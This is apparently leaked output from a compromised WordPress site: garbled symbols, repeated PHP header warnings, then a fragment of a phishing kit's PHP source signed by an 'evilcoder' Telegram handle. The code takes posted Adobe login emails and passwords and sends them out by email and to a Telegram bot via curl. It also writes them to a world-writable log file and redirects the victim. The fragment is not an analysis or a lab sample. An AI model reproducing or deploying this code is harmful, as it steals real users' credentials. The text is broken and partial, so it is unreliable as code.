……&&*……%@#¥……%&*(())*&……%¥#%
Warning: Cannot modify header information - headers already sent by (output started at /home/jjexpress/public_html/wp-content/abouta.php:1) in /home/jjexpress/public_html/wp-content/abouta.php on line 216
Warning: Cannot modify header information - headers already sent by (output started at /home/jjexpress/public_html/wp-content/abouta.php:1) in /home/jjexpress/public_html/wp-content/abouta.php on line 217
Warning: Cannot modify header information - headers already sent by (output started at /home/jjexpress/public_html/wp-content/abouta.php:1) in /home/jjexpress/public_html/wp-content/abouta.php on line 218
Warning: Cannot modify header information - headers already sent by (output started at /home/jjexpress/public_html/wp-content/abouta.php:1) in /home/jjexpress/public_html/wp-content/abouta.php on line 219
Warning: Cannot modify header information - headers already sent by (output started at /home/jjexpress/public_html/wp-content/abouta.php:1) in /home/jjexpress/public_html/wp-content/abouta.php on line 220
Warning: Cannot modify header information - headers already sent by (output started at /home/jjexpress/public_html/wp-content/abouta.php:1) in /home/jjexpress/public_html/wp-content/abouta.php on line 221
Tele: @evilcoder_1337 】━━━━━[+\n";
$subjects = "ADOBE 【1】 LOGIN INFO EvilCoder😈 FROM 😈- $ip";
$headers = "";
if(!empty($_POST['Em'] && $_POST['Pa'])){
if (mail($functions,$subjects,$messages,""))
if (mail($recipient,$subjects,$messages,$headers))
{
$website="https://api.telegram.org/bot$TeleToken";
$params=[
'chat_id'=>$TeleID,
'text'=>$messages,
];
$ch = curl_init($website . '/sendMessage');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ($params));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
header("Location:../indexs.php");
}
else
{
header("Location:../index.php");
}}
else
{
header("Location:../index.php");
}
$iplogfile = 'Rs.txt';
$fp = fopen($iplogfile, 'a+');
chmod($iplogfile, 0777);
fwrite($fp, ' '.$messages.' '."\n");
fclose($fp);
/*
*/
?>